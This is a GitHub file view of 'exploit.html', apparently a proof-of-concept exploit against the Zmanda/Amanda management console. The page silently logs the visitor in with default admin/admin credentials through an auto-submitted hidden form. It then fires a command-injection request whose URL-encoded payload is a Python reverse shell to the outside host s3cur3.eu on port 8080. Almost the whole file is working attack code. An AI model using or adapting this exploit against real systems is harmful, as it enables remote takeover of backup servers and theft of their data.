-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathexploit.html
31 lines (26 loc) · 1.47 KB
/
exploit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<html>
<body> <!-- Force the user to log in using the default credentials -->
<form target="_blank" action="https://X.X.X.X/ZMC_Admin_Login?cookies_checked=1" method="POST">
<input type="hidden" name="login" value="AEE" />
<input type="hidden" name="last_page" value="" />
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="submit" value="Login" />
<input type="hidden" name="JS_SWITCH" value="JS_ON" />
<input id=prepare type="submit" value="" />
</form>
<!-- After the user is authenticated trigger code execution -->
<a id=boom target="_blank" href='https://X.X.X.X/ZMC_Admin_Advanced?form=adminTasks&action=Apply&command=echo%20-a|python%20-c%20%27import%20socket%2csubprocess%2cos%3bs%3dsocket%2esocket%28socket%2eAF_INET%2csocket%2eSOCK_STREAM%29%3bs%2econnect%28%28"s3cur3%2eeu"%2c8080%29%29%3bos%2edup2%28s%2efileno%28%29%2c0%29%3bos%2edup2%28s%2efileno%28%29%2c1%29%3bos%2edup2%28s%2efileno%28%29%2c2%29%3bp%3dsubprocess%2ecall%28%5b"%2fbin%2fsh"%2c"-i"%5d%29%3b%27'></a>
<script>
document.getElementById("prepare").click();
function Sleep(milliseconds) {
return new Promise(resolve => setTimeout(resolve, milliseconds));
}
async function exploit() {
await Sleep(5000); // Wait 5s to make sure the user is authenticated until the request is fired
document.getElementById("boom").click();
}
exploit();
</script>
</body>
</html>